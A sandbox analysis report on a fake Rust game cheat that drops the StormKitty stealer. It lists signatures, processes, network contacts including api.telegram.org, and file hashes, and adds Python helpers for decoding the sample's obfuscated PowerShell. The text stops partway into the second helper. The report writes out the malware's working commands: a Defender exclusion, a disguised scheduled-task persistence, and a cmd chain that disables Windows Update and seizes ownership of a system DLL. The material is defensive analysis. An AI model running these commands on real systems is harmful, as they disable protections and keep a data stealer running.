Analysis Overview
SHA256
d369a5d2ef50b7e9eea2e61b45294270c0a27cad70edb47cf61ba76f1810fad7
Threat Level: Known bad
The file rustcheat.exe was found to be: Known bad.
Malicious Activity Summary
Modifies security service
StormKitty payload
StormKitty
Stops running service(s)
Possible privilege escalation attempt
Downloads MZ/PE file
Modifies file permissions
Executes dropped EXE
VMProtect packed file
Loads dropped DLL
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Kills process with taskkill
Modifies system certificate store
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Modifies registry key
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-12 12:40
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2023-08-12 12:40
Reported
2023-08-12 12:43
Platform
win10v2004-20230703-en
Max time kernel
12s
Max time network
19s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\system32\reg.exe | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\rustcheat.exe
"C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"
C:\Users\Admin\AppData\Local\Temp\testy.exe
"C:\Users\Admin\AppData\Local\Temp\testy.exe"
C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
"C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAcQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAiACcAKQAgADwAIwBhAGYAZQAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuACkAIAA8ACMAaABzAGkAdAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AeQBwAHAAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAG8AcwBpACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAdABlAHMAdAB5AC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZwBmACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBkAHEAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
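Both powershell.exe launches above pass their script as -EncodedCommand, which is base64 of the UTF-16LE script text, and the script itself is padded with empty block comments (<#ub#>, <#qbue#>, ...) that PowerShell ignores but that change the base64 of every build. The Python below is an added analyst helper, not part of the report or of the sample: it decodes the two blobs copied verbatim from the process list, strips the junk comments and returns the plain commands. Decoded, the first launch is `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force`, a Defender exclusion covering the whole user profile and system drive; the second registers and immediately starts a highest-privilege logon task named GoogleUpdateTaskMachineQC that runs a copy of testy.exe placed at Google\Chrome\updater.exe. Function names are this example's own.

```python
"""Decode the obfuscated PowerShell -EncodedCommand arguments from the report.

-EncodedCommand takes base64 of the UTF-16LE script text. The sample pads the
script with empty block comments such as <#ub#> and <#qbue#>, which PowerShell
ignores but which make every build's base64 look different; stripping them
recovers the real command so it can be read and matched against detections.
"""
import base64
import re

# Both blobs are copied verbatim from the report's behavioral2 process list.
DEFENDER_EXCLUSION_B64 = (
    "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"
)
SCHEDULED_TASK_B64 = (
    "PAAjAHkAcQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAiACcAKQAgADwAIwBhAGYAZQAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuACkAIAA8ACMAaABzAGkAdAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AeQBwAHAAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAG8AcwBpACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAdABlAHMAdAB5AC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZwBmACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBkAHEAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
)

# PowerShell block comment: <# ... #>, possibly spanning lines.
_JUNK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)


def decode_encoded_command(b64: str) -> str:
    """Return the script text behind a -EncodedCommand argument."""
    # PowerShell tolerates missing '=' padding; the stdlib decoder does not.
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def junk_comments(script: str) -> list:
    """List the <# ... #> comments used as signature-breaking padding."""
    return _JUNK_COMMENT.findall(script)


def strip_junk_comments(script: str) -> str:
    """Remove block comments and collapse the whitespace they leave behind."""
    return re.sub(r"\s+", " ", _JUNK_COMMENT.sub(" ", script)).strip()


def deobfuscate(b64: str) -> str:
    """Decode and clean an -EncodedCommand blob in one step."""
    return strip_junk_comments(decode_encoded_command(b64))


if __name__ == "__main__":
    for label, blob in (("Defender exclusion", DEFENDER_EXCLUSION_B64),
                        ("scheduled task", SCHEDULED_TASK_B64)):
        raw = decode_encoded_command(blob)
        print(f"[{label}] {len(junk_comments(raw))} junk comments stripped")
        print(deobfuscate(blob))
        print()
```

Because the padding comments carry no semantics, a detection that keys on the decoded, comment-stripped text (for example `Add-MpPreference` together with `-ExclusionPath` and `$env:SystemDrive`) survives rebuilds of the sample, while a signature on the raw base64 does not.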
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.211.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\testy.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
| MD5 | 7b8fcb29905e045b7f8c1dc9bc305698 |
| SHA1 | 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8 |
| SHA256 | 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173 |
| SHA512 | d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2 |
memory/1496-157-0x0000000000230000-0x0000000000280000-memory.dmp
memory/2576-158-0x0000000000D50000-0x000000000116E000-memory.dmp
memory/1496-159-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
memory/2576-160-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
memory/2576-161-0x000000001CE60000-0x000000001CE70000-memory.dmp
memory/1496-162-0x000000001BDC0000-0x000000001BDD0000-memory.dmp
memory/4668-168-0x0000013F95060000-0x0000013F95082000-memory.dmp
memory/4668-173-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nnunhuth.zn0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4668-175-0x0000013F955B0000-0x0000013F955C0000-memory.dmp
memory/4668-174-0x0000013F955B0000-0x0000013F955C0000-memory.dmp
memory/4668-176-0x0000013F955B0000-0x0000013F955C0000-memory.dmp
memory/4668-179-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
memory/1496-180-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
memory/2576-181-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
| MD5 | 6d1c62ec1c2ef722f49b2d8dd4a4df16 |
| SHA1 | 1bb08a979b7987bc7736a8cfa4779383cb0ecfa6 |
| SHA256 | 00da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c |
| SHA512 | c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2 |
C:\Users\Admin\AppData\Local\Temp\AnonFileApi.dll
| MD5 | 7a2d5deab61f043394a510f4e2c0866f |
| SHA1 | ca16110c9cf6522cd7bea32895fd0f697442849b |
| SHA256 | 75db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69 |
| SHA512 | b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0 |
memory/2576-192-0x000000001CE60000-0x000000001CE70000-memory.dmp
memory/2576-193-0x000000001CD90000-0x000000001CDA2000-memory.dmp
memory/1496-194-0x000000001BDC0000-0x000000001BDD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/4744-205-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
memory/4744-206-0x000001831BD60000-0x000001831BD70000-memory.dmp
memory/4744-207-0x000001831BD60000-0x000001831BD70000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
memory/4744-209-0x000001831BD60000-0x000001831BD70000-memory.dmp
memory/4744-212-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
| MD5 | 5802cd85f72d4d1afcf72d5daeb12e0a |
| SHA1 | 61f7f3cb6dcf20edfb29f56cb6fabe529cc4a59e |
| SHA256 | 91d8fd9f83b068436c733b72e2c128092ce55a56ff936ef6ae042b332ba0edf6 |
| SHA512 | fce715c7aca23d2787f6e38d507ace7c49293b0f73dc8525839eb9736d99b82881a9e4904dae2117c577917d1bc161150119b767e26870521c997378f55c3505 |
memory/2296-216-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp
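The two cmd.exe chains in the process list above (repeated in the behavioral1 run below) are the sample's defence-impairment step, done entirely with built-in tools: it stops and then deletes the service definitions of UsoSvc, WaaSMedicSvc, wuauserv, bits and dosvc; takes ownership of WaaSMedicSvc.dll and grants Everyone (S-1-1-0) full control so that the Update Medic DLL can be renamed; sets Windows Update policy values; disables the WindowsUpdate and UpdateOrchestrator scheduled tasks; and sets every sleep and hibernate timeout to 0, which powercfg treats as "never". The Python below is an added triage helper, not part of the report or of the sample: it splits the recorded '&' chains into sub-commands and classifies each one, so the result can be compared against process-creation detections. The command lines are copied verbatim from the process lists; the function names and technique labels are this example's own. One detail the breakdown surfaces: the behavioral1 run's `TaskKill /F /IM 2632` passes a PID-looking value to /IM, which expects an image name, so that kill most likely failed.

```python
"""Triage the chained cmd.exe command lines recorded for this sample.

The update-disabling step is living-off-the-land: built-in tools joined with
'&' inside one cmd.exe /c. Splitting the chain and classifying each
sub-command turns the flat command line into a per-technique list that maps
directly onto process-creation detections.
"""
import re

# Copied verbatim from the report's process lists.
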